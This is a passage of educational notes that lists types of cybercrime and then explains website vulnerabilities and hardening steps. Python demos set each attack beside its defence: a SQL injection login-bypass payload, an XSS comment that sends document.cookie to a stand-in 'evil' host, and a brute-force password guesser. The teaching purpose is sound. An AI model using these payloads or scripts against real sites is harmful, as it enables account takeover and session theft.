2) Unwarranted mass-surveillance
Mass surveillance means surveillance of a substantial fraction of a group of people by the
authority especially for the security purpose, but if someone does it for personal interest, it is
considered as cybercrime.
3) Child pornography
It is one of the most heinous crimes that is brazenly practiced across the world. Children are
sexually abused and videos are being made and uploaded on the Internet.
4) Child grooming
It is the practice of establishing an emotional connection with a child especially for the purpose
of child-trafficking and child prostitution.
5) Copyright infringement
Using or republishing someone's copyright-protected work without permission, for example
publishing it under one's own name, is copyright infringement.
6) Identity theft
Identity theft occurs when a cyber-criminal impersonates someone else's identity in order to
commit fraud in that person's name.
7) Denial of Service Attack:
In this cyberattack, the cyber-criminal floods the victim's network, server or mailbox with
traffic or spam so that legitimate requests cannot be served. The intention is to disrupt
their regular services.
8) Software Piracy:
Theft of software by illegally copying genuine programs or counterfeiting them. It also
includes the distribution of products intended to pass as the original.
9) Phishing:
Phishing is the technique of extracting confidential information (passwords, card numbers,
account details) from bank or other account holders by impersonating a trusted party,
typically through fake emails and look-alike websites.
10) Spoofing:
Spoofing is the act of making one computer system or network pretend to have the identity of
another (for example by forging IP addresses, email sender addresses or DNS answers). It is
mostly used to obtain the privileges that the impersonated network or computer enjoys.
11) Click fraud
Advertising companies such as Google AdSense offer pay-per-click advertising services. Click
fraud occurs when a person clicks such a link with no interest in the advertisement, only to
generate revenue or to drain a competitor's advertising budget. This is often done using
automated software that makes the clicks.
12) Advance Fee Fraud
An email is sent to the target victim promising a large sum of money, typically in return for
helping to claim an inheritance, but only after the victim pays a fee or shares bank details
in advance.
13) Cyber-extortion
When a hacker compromises someone's email server or computer system and demands money to
restore it (ransomware is the best-known form), it is known as cyber-extortion.
14) Cyber-terrorism
When someone hacks a government's security systems, or intimidates a government or a large
organization, to advance political or social objectives by attacking through computer
networks, it is known as cyber-terrorism.
15) Computer virus
Viruses are malicious programs that copy themselves into other programs or files. They can
annoy users, steal sensitive data, or be used to take control of equipment that is controlled
by computers.

Securing the Web


There are many ways to assure yourself, your employees and your customers that your website is
safe. Website security does not have to be a guessing game: take the essential steps towards
improving your site's security and keeping data away from prying eyes.
No method can guarantee that your site will forever be "hacker-free", but preventive measures
reduce your site's attack surface. Website security is simple in its principles and complicated
in its details.
Website Vulnerabilities & Threats
The most common website security vulnerabilities and threats are:
1. SQL Injections
SQL injection happens when user-supplied input is concatenated into a SQL query instead of
being passed as a separate parameter. The attacker sends specially crafted input (quotes,
comment markers, extra clauses) that changes the structure of the query the website sends to
the database. A successful attack alters the query so that it returns the information the
attacker wants instead of what the website expected; it can also modify or delete data, bypass
logins, or in some configurations run commands on the database server.
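The login-bypass form of the attack, and the parameterized query that closes it, as an added example written for these notes (not code from the original page). The users table is created in an in-memory SQLite database, and the attacker's input is constructed; passwords are hashed with plain SHA-256 only to keep the example short, whereas a real system must use a slow, salted hash such as PBKDF2, bcrypt or Argon2.

```python
"""SQL injection: a login query built by string concatenation beside the
parameterized version. Added example, not from the notes; the users table
and the attacker input are constructed inline (in-memory SQLite)."""
import hashlib
import sqlite3


def make_db():
    """Constructed sample data: two accounts in an in-memory database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT PRIMARY KEY, pw_hash TEXT)")
    for user, pw in [("admin", "correct horse battery staple"), ("alice", "hunter2")]:
        conn.execute("INSERT INTO users VALUES (?, ?)",
                     (user, hashlib.sha256(pw.encode()).hexdigest()))
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """Concatenates user input into the SQL text. Attacker-controlled quotes
    and comment markers therefore change what the query means."""
    pw_hash = hashlib.sha256(password.encode()).hexdigest()
    query = ("SELECT username FROM users WHERE username = '" + username +
             "' AND pw_hash = '" + pw_hash + "'")
    row = conn.execute(query).fetchone()
    return row[0] if row else None


def login_parameterized(conn, username, password):
    """Placeholders: the driver sends the values separately from the SQL
    text, so input is always data and never part of the query structure."""
    pw_hash = hashlib.sha256(password.encode()).hexdigest()
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND pw_hash = ?",
        (username, pw_hash),
    ).fetchone()
    return row[0] if row else None


def demo():
    conn = make_db()
    # Constructed attacker input: the quote closes the string literal and
    # '--' turns the rest of the query, including the password check, into
    # a comment. The vulnerable query becomes:
    #   SELECT username FROM users WHERE username = 'admin' --' AND pw_hash = '...'
    payload = "admin' --"
    return {
        "legit_vulnerable": login_vulnerable(conn, "alice", "hunter2"),
        "attack_vulnerable": login_vulnerable(conn, payload, "anything"),
        "legit_parameterized": login_parameterized(conn, "alice", "hunter2"),
        "attack_parameterized": login_parameterized(conn, payload, "anything"),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

With the concatenated query the attacker logs in as admin without knowing any password; with placeholders the same input is simply looked up as the (non-existent) username "admin' --" and the login fails. The fix is the same in every language and database driver: never build SQL from user input, always bind parameters.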
2. Cross-site Scripting (XSS)
Cross-site scripting attacks consist of injecting malicious client-side scripts into a website,
so that the website itself delivers the script to its visitors.
The danger behind XSS is that the attacker's content becomes part of the page, so a victim's
browser executes the attacker's code when loading it, with the victim's session cookies and
privileges. If a logged-in site administrator loads the page, the script runs with their level
of privilege, which can lead to site takeover. The defence is to treat all user-supplied data
as text: escape it for the context it is inserted into (HTML body, attribute, JavaScript, URL)
and add a Content-Security-Policy header as a second layer.
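How a stored comment breaks out of the page, and what context-aware escaping does to the same comment, as an added example written for these notes (not code from the original page). The page template, the escaping helpers and the attacker's comment are all constructed; the audit uses Python's own HTML parser to count how many script elements and how many attributes on the link the rendered page actually contains.

```python
"""Stored XSS: a comment rendered straight into HTML beside context-aware
escaping for the HTML body, an attribute and an inline JavaScript value.
Added example, not from the notes; the 'comment' is a constructed payload."""
import html
import json
from html.parser import HTMLParser


def render_unsafe(comment):
    """What a vulnerable template does: string interpolation into markup,
    in three different contexts."""
    return (f"<div class='comment'>{comment}</div>"
            f"<a title='{comment}'>by</a>"
            f"<script>var last = '{comment}';</script>")


def esc_html(value):
    """HTML body text and quoted attribute values: escape & < > \" and '."""
    return html.escape(str(value), quote=True)


def esc_js(value):
    """Value inside a <script> block: JSON-encode it, then also escape the
    characters that could close the script element or inject HTML."""
    encoded = json.dumps(str(value))
    return (encoded.replace("<", "\\u003c")
                   .replace(">", "\\u003e")
                   .replace("&", "\\u0026"))


def render_safe(comment):
    """Same template, each insertion escaped for its own context."""
    return (f"<div class='comment'>{esc_html(comment)}</div>"
            f"<a title='{esc_html(comment)}'>by</a>"
            f"<script>var last = {esc_js(comment)};</script>")


class TagAudit(HTMLParser):
    """Counts <script> start tags and records the attribute names on <a>
    tags, so we can see whether the payload created new tags or attributes."""

    def __init__(self):
        super().__init__()
        self.script_tags = 0
        self.anchor_attrs = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.script_tags += 1
        if tag == "a":
            self.anchor_attrs.extend(name for name, _value in attrs)


def audit(page):
    """Returns (number of script elements, sorted attribute names on <a>).
    The template legitimately contains one script and one title attribute."""
    parser = TagAudit()
    parser.feed(page)
    parser.close()
    return parser.script_tags, sorted(parser.anchor_attrs)


def demo():
    # Constructed attacker comment: breaks out of the attribute (adds an
    # onmouseover handler) and out of text (adds a script element).
    payload = "' onmouseover='alert(1)'><script>fetch('//evil/'+document.cookie)</script>"
    return {"unsafe": audit(render_unsafe(payload)),
            "safe": audit(render_safe(payload))}


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: script elements={value[0]}, <a> attributes={value[1]}")
```

In the unsafe rendering the parser sees extra script elements and an onmouseover attribute that the template never had; in the safe rendering it sees exactly the one script block and the one title attribute the template defines, with the payload reduced to inert text. The important point is that the escaping differs per context: HTML entity escaping is wrong inside a script block, and JSON encoding alone is not enough there either, which is why esc_js also neutralizes the angle brackets.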
3. Credential Brute Force Attacks
Gaining access to a website's admin area, control panel or even to the SFTP server is one of
the most common ways websites are compromised. The process is very simple: the attacker runs a
script that tries many combinations of usernames and passwords (often taken from lists of
leaked passwords) until one works. Rate limiting, account lockout, multi-factor authentication
and slow password hashing all raise the cost of each guess.
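The attacker's script and two login implementations it can be pointed at, as an added example written for these notes (not code from the original page). The first authenticator accepts unlimited guesses; the second locks the account after a few consecutive failures, stores passwords with a salted PBKDF2 hash so that each guess costs CPU time, and takes an injectable clock so the lockout window can be exercised without waiting. The users, the word list, the lockout parameters and the clock are all constructed for the demonstration.

```python
"""Credential brute force against a login endpoint: a scripted guesser
against an unthrottled authenticator, then the same guesser against one
that locks the account after repeated failures and uses a slow salted
hash. Added example, not from the notes; the users, passwords, word list
and clock are all constructed for the demonstration."""
import hashlib
import hmac
import os
import time

MAX_FAILURES = 5          # consecutive failures before the account locks
LOCKOUT_SECONDS = 900     # 15 minutes
PBKDF2_ROUNDS = 50_000    # per-guess cost; use a higher value in production


class Authenticator:
    def __init__(self, throttle=True, clock=time.monotonic):
        self.throttle = throttle
        self.clock = clock           # injectable so the lockout can be tested
        self.users = {}              # username -> (salt, pbkdf2 digest)
        self.failures = {}           # username -> [count, locked_until]
        self.hashes_computed = 0     # guesses that actually cost CPU time

    @staticmethod
    def _hash(password, salt):
        # Slow, salted hash: every guess costs real CPU time, and a leaked
        # database cannot be attacked with precomputed tables.
        return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)

    def add_user(self, username, password):
        salt = os.urandom(16)
        self.users[username] = (salt, self._hash(password, salt))

    def login(self, username, password):
        """Returns 'ok', 'bad' or 'locked'."""
        count, locked_until = self.failures.get(username, [0, 0.0])
        if self.throttle and self.clock() < locked_until:
            return "locked"          # rejected before any hashing or lookup
        self.hashes_computed += 1
        record = self.users.get(username)
        # Do the same work for unknown users so that response time does not
        # reveal which usernames exist.
        salt, stored = record if record else (bytes(16), None)
        candidate = self._hash(password, salt)
        if stored is not None and hmac.compare_digest(candidate, stored):
            self.failures.pop(username, None)
            return "ok"
        count += 1
        if self.throttle and count >= MAX_FAILURES:
            self.failures[username] = [0, self.clock() + LOCKOUT_SECONDS]
        else:
            self.failures[username] = [count, locked_until]
        return "bad"


def brute_force(auth, username, wordlist):
    """The attacker's script: try each candidate once, stop on success."""
    for word in wordlist:
        if auth.login(username, word) == "ok":
            return word
    return None


def demo():
    # Constructed word list; the real password is weak enough to be in it.
    wordlist = ["123456", "password", "qwerty", "letmein", "admin",
                "welcome", "sunshine", "Summer2024!", "P@ssw0rd", "monkey"]
    real_password = "P@ssw0rd"

    open_auth = Authenticator(throttle=False)
    open_auth.add_user("admin", real_password)
    cracked_open = brute_force(open_auth, "admin", wordlist)

    fake_clock = [1000.0]
    hard_auth = Authenticator(throttle=True, clock=lambda: fake_clock[0])
    hard_auth.add_user("admin", real_password)
    cracked_hard = brute_force(hard_auth, "admin", wordlist)
    guesses_that_cost_cpu = hard_auth.hashes_computed

    # Once the lockout window passes, the legitimate user gets back in.
    fake_clock[0] += LOCKOUT_SECONDS + 1
    legit = hard_auth.login("admin", real_password)
    return {
        "cracked_without_throttle": cracked_open,
        "cracked_with_throttle": cracked_hard,
        "guesses_hashed_with_throttle": guesses_that_cost_cpu,
        "legit_login_after_window": legit,
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Against the unthrottled login the script recovers the password on its ninth guess; against the hardened one it gets five attempts, the account locks, and every further guess is refused without even computing a hash. Account lockout is itself abusable (an attacker can lock out a legitimate user on purpose), so in production it is combined with per-IP throttling, progressive delays or CAPTCHA, multi-factor authentication, and alerting on repeated lockouts.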
4. Website Malware Infections & Attacks
Using some of the previous security issues to gain unauthorized access to a website,
attackers can then:
• Inject SEO spam into the page
• Drop a backdoor (for example a web shell) to maintain access
• Collect visitor information or credit card data
• Run exploits on the server to escalate their access level
• Use visitors' computers to mine crypto-currencies
• Host botnet command-and-control scripts
• Show unwanted ads or redirect visitors to scam sites
• Host malicious downloads
• Launch attacks against other sites

5. DoS/DDoS Attacks
A Distributed Denial of Service (DDoS) attack is a non-intrusive internet attack: it does not
break into the site, but takes it down or slows it down by flooding the network, server or
application with bogus traffic from many sources at once.
DDoS attacks are threats that website owners must familiarize themselves with, as they are a
critical part of the security landscape. When a DDoS attack targets a vulnerable,
resource-intensive endpoint (an expensive search or report page, for instance), even a small
amount of traffic is enough for the attack to succeed, so rate limiting and caching of such
endpoints matter as much as raw bandwidth.

Website Security Framework

The US National Institute of Standards and Technology (NIST) developed the Cybersecurity
Framework, which forms the basis of the website security principles described here.
Security is a continuous process, so it should start from the foundation of a website
security framework. This framework involves creating a "culture of security" in which
scheduled audits keep things simple and timely.
The five functions, Identify, Protect, Detect, Respond and Recover, are broken out below along
with actions to be applied. (Version 2.0 of the framework, released in 2024, adds a sixth
function, Govern.)
There are at least ten essential steps you can take to improve website safety.
How to Improve Your Websites Safety
1. Keep Software And Plugins Up-To-Date
Every day, countless websites are compromised because of outdated software. Attackers and bots
continuously scan sites for known vulnerabilities in old versions. Updates are vital to the
health and security of your website: if your site's software or plugins are not up-to-date,
your site is not secure.
Take all software and plugin update requests seriously.
Updates often contain security enhancements and vulnerability fixes. Check your website for
updates or add an update notification plugin. Some platforms allow automatic updates, which is
another option to ensure website security.
2. Add HTTPS and a TLS (SSL) Certificate
To keep your website safe, you need a secure URL. If your site visitors send you their private
information, you need HTTPS, not HTTP, to carry it.
What is HTTPS?
HTTPS (Hypertext Transfer Protocol Secure) is HTTP carried over an encrypted TLS connection. It
protects content in transit between the visitor's browser and your server: an attacker on the
network cannot read it, cannot alter it without detection, and cannot impersonate your server,
because the certificate ties the connection to your domain.
To create a secure connection, your website needs a certificate issued by a certificate
authority (free ones are available from Let's Encrypt). If your website asks visitors to
register, sign up or make a transaction of any kind, you must encrypt the connection.
What is SSL?
SSL (Secure Sockets Layer) is the older name for the protocol now called TLS (Transport Layer
Security). People still say "SSL certificate", but all SSL versions are obsolete and servers
should enable only TLS 1.2 and 1.3. TLS encrypts the information exchanged between the
visitor's browser and your web server so that nobody in between can read it, and the
certificate lets the browser verify that it is talking to the genuine site.
Note that TLS protects data in transit only. It does not encrypt data stored in your database,
and it does not stop attacks such as SQL injection that travel inside the encrypted connection.
3. Choose a Smart Password
With so many websites, databases and programs needing passwords, it is hard to keep track.
Many people end up using the same password everywhere so that they can remember it. This is a
serious security mistake: one leaked password then opens every account.
Create a unique password for every login. Come up with long, random, hard-to-guess passwords,
and store them in a password manager, never in a file inside the website directory.
Do not use any personal information in a password. Do not use your birthday or your pet's
name; make it unguessable. Smart passwords are long, at least twelve characters, and should
mix letters, numbers and symbols. Never reuse a password or share it with others. Change a
password immediately if you suspect it has been exposed. Forced rotation every three months
was once common advice, but current NIST guidance (SP 800-63B) recommends against periodic
changes unless there is evidence of compromise, since they push people toward weak,
predictable variations. Enable multi-factor authentication on administrative accounts wherever
it is available.
If you are a business owner or CMS manager, ensure that all employees follow the same rules and
that every person has their own account and credentials.
4. Use a Secure Web Host
Think of your website's domain name as a street address. Now think of the web host as the plot
of "real estate" where your website exists online.
Just as you would research a plot of land before building a house, you need to examine
potential web hosts to find the right one. Many hosts provide server security features that
better protect your uploaded website data. Check for the following when choosing a host:
▪ Does the web host offer Secure File Transfer Protocol (SFTP) instead of plain FTP, which
sends passwords in clear text?
▪ Is anonymous FTP access disabled?
▪ Does it run a rootkit scanner?
▪ Does it offer file backup services?
▪ How quickly does it apply security upgrades?
Whether you choose SiteGround or WP Engine as your web host, make sure it has what you need
to keep your site secure.
5. Record User Access and Administrative Privileges
Initially, you may feel comfortable giving several high-level employees access to your website.
If they make a mistake or overlook an issue, the result can be a significant security incident.
It is vital to vet employees before giving them website access. Find out whether they have
experience with your CMS and whether they know what to look for to avoid a security breach.
Educate every CMS user about the importance of passwords and software updates, and tell them
how they can help maintain the website's safety. Give each user only the permissions their
role requires (least privilege); most CMS users do not need administrator rights.
To keep track of who has access to your CMS and with which administrative settings, make a
record and update it often. Employees come and go, and the accounts of people who have left
must be removed promptly. A maintained access register of who does what with your website is
one of the best ways to prevent security issues.
6. Change Your CMS Default Settings
The most common attacks against websites are entirely automated, and many attack bots rely on
sites still running their CMS with default settings. After choosing your CMS, change the
default settings immediately: the default administrator username, the default login path and
table prefixes, file permissions, and anything else an attacker can predict. These changes
prevent a large number of automated attacks.
CMS settings to review include comment controls, user visibility and permissions. Customize
users and their permission settings. Do not keep the defaults as they are, or you will run
into website security issues at some point.
7. Backup Your Website
One of the best ways to keep your site safe is to have a good backup solution, and you should
have more than one. Each is crucial to recovering your website after a major security
incident.
There are several solutions you can use to recover damaged or lost files.
Keep your website backups off-site. Do not store backups on the same server as your website;
they are just as vulnerable to attack there, and an attacker or ransomware that takes the
server takes the backups with it.
One option is to keep a website backup on an office computer or an external hard drive. Find
an off-site place to store your data to protect it from hardware failures, hacks and viruses.
Another option is to back up your website in the cloud. It makes storing data easy and allows
access from anywhere. Be redundant in your backup process: back up your backup (a common rule
of thumb is 3-2-1: three copies, on two different media, one of them off-site). Keep several
generations, so that you can recover files from a point before the hack or infection occurred,
and test restores regularly.
8. Know Your Web Server Configuration Files
Get to know your web server configuration files. For Apache these are httpd.conf and the
.htaccess files in the web directories; for Nginx, nginx.conf; for Microsoft IIS, web.config.
These files let you set server rules, including directives that improve your website's
security: forcing HTTPS, setting security headers, disabling directory listing, and denying
access to configuration and backup files.
9. Deploy a Web Application Firewall
Deploy a web application firewall (WAF). It sits between your website server and the incoming
connections and inspects every request that passes through it, blocking known attack patterns
such as SQL injection and cross-site scripting payloads before they reach your site. A WAF is a
useful extra layer, but not a replacement for fixing the vulnerabilities in the application
itself.
10. Tighten Network Security
Once you think your website is secure, analyze your network security. Employees who use office
computers may inadvertently create an unsafe path to your website.
To prevent them from giving attackers access to your website's server, consider the following
at your business:
o Have computer logins expire after a short period of inactivity.
o Make sure the system enforces your password policy and prompts users to change a
password when a change is required, for example after a suspected compromise.
o Ensure that all devices plugged into the network are scanned for malware each time
they are attached.
